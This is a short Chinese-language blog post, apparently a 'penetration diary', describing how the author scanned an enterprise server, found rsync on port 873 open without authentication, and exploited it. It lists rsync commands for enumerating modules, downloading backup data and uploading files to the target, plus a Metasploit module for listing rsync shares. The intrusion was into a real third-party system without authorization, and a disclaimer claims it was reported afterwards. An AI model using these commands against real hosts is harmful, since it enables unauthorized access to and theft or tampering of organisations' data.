- 免责声明
此次对这个ip进行的渗透我并没有进行更进一步的提权获取数据等操作并且也不会损害任何相关的利益 此漏洞我已联系网安这边沟通对此漏洞进行上报 希望尽快修复
- 渗透日记
在日常用nmap扫描渗透的过程中我发现了一个873开放的端口 百度了一下873端口属于rsync的服务端口并且存在一个未授权访问漏洞 我便尝试进行进一步渗透测试
此靶机属于某企业的服务器 也算得上半个gov了

- 关于漏洞
- 扫描靶机数据
关于这个漏洞我发现可以使用rsync命令进行查看备份文件
rsync的默认密码一般为::
以下是rsync命令的使用方法
rsync host:: //默认连接方法 适用于没有改变过rsync默认873端口 host为指定目标的域名或IP
rsync rsync://host //默认连接
rsync --port=888 host:: //指定使用888端口进行连接
rsync -avz host::data /root //-avz表示下载服务器内备份文件 data为文件名 /root为保存目录
rsync -anv host:: //如不知道rsync执行后会产生什么作用可以使用-n先测试

看到使用命令后出现了一个备份数据
也可以使用metasploit扫描利用
启动metasploit后使用此模块
auxiliary/scanner/rsync/modules_list
并设置RHOSTS扫描目标
use auxiliary/scanner/rsync/modules_list
set rhost host
run
然后使用run启动扫描

也可扫描出其中的数据
- 使用rsync漏洞获取其中数据
使用以下命令可以对靶机进行一些操作
rsync host:: //默认连接查看数据
rsync 1.txt host::bak_for_102 //进行上传文件操作(“bak_for_102”为数据名)
rsync host::bak_for_102 /root //进行下载文件